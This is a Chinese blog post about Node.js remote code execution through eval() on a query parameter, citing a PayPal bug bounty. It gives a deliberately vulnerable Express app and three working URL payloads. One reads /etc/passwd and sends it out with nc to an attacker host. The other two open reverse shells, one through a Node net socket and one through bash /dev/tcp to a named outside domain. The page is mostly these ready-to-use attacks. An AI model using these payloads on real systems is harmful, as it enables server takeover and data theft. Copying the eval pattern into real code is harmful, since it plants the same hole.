首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
NodeJS与Mysql的交互示例代码
Aug 18 NodeJs
基于promise.js实现nodejs的promises库
Jul 06 NodeJs
nodejs教程之环境安装及运行
Nov 21 NodeJs
Windows系统下使用Sublime搭建nodejs环境
Apr 13 NodeJs
NodeJs中的VM模块详解
May 06 NodeJs
Nodejs 获取时间加手机标识的32位标识实现代码
Mar 07 NodeJs
nodejs6下使用koa2框架实例
May 18 NodeJs
nodeJS实现简单网页爬虫功能的实例(分享)
Jun 08 NodeJs
基于nodejs res.end和res.send的区别
May 14 NodeJs
Nodejs libuv运行原理详解
Aug 21 NodeJs
使用nodejs实现JSON文件自动转Excel的工具(推荐)
Jun 24 NodeJs
详解nodejs内置模块
May 06 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
hmac(1) 相对路径 (1) 面向对象(3) openpyxl(1) mt-swipe(1) Mint UI(1) requests(1) 慢日志(1) hashlib(1) 相对路径(1)
You might like
PHP5中MVC结构学习
2006/10/09 PHP
php 信息采集程序代码
2009/03/17 PHP
php并发对MYSQL造成压力的解决方法
2013/02/21 PHP
ThinkPHP实现ajax仿官网搜索功能实例
2014/12/02 PHP
js left,right,mid函数
2008/06/10 Javascript
JS 进度条效果实现代码整理
2011/05/21 Javascript
javascript函数以及基础写法100多条实用整理
2013/01/13 Javascript
js中数组Array的一些常用方法总结
2013/08/12 Javascript
JQuery 图片滚动轮播示例代码
2014/03/24 Javascript
如何获取网站icon有哪些可行的方法
2014/06/05 Javascript
jquery实现保存已选用户
2014/07/21 Javascript
一个支付页面DEMO附截图
2014/07/22 Javascript
javascript学习笔记(一)基础知识
2014/09/30 Javascript
jQuery+jRange实现滑动选取数值范围特效
2015/03/14 Javascript
jQuery中选择器的基础使用教程
2016/05/23 Javascript
浅谈String.valueOf()方法的使用
2016/06/06 Javascript
纯js实现动态时间显示
2020/09/07 Javascript
微信小程序选择图片和放大预览图片功能
2017/11/02 Javascript
Vue精简版风格概述
2018/01/30 Javascript
解决vue脚手架项目打包后路由视图不显示的问题
2018/09/20 Javascript
微信小程序MUI导航栏透明渐变功能示例(通过改变opacity实现)
2019/01/24 Javascript
vue多次循环操作示例
2019/02/08 Javascript
解决Layui当中的导航条动态添加后渲染失败的问题
2019/09/25 Javascript
Python实现网站文件的全备份和差异备份
2014/11/30 Python
Python中的生成器和yield详细介绍
2015/01/09 Python
分享Python文本生成二维码实例
2016/01/06 Python
使用Python对MySQL数据操作
2017/04/06 Python
python利用有道翻译实现"语言翻译器"的功能实例
2017/11/14 Python
浅谈解除装饰器作用(python3新增)
2018/10/15 Python
Python基本语法之运算符功能与用法详解
2019/10/22 Python
美国休闲服装品牌:Express
2016/09/24 全球购物
台湾线上百货零售购物平台:friDay购物
2017/08/18 全球购物
公务员培的训心得体会
2014/09/01 职场文书
世界遗产导游词
2015/02/13 职场文书
写给媳妇的检讨书
2015/05/06 职场文书
海上钢琴师的观后感
2015/06/11 职场文书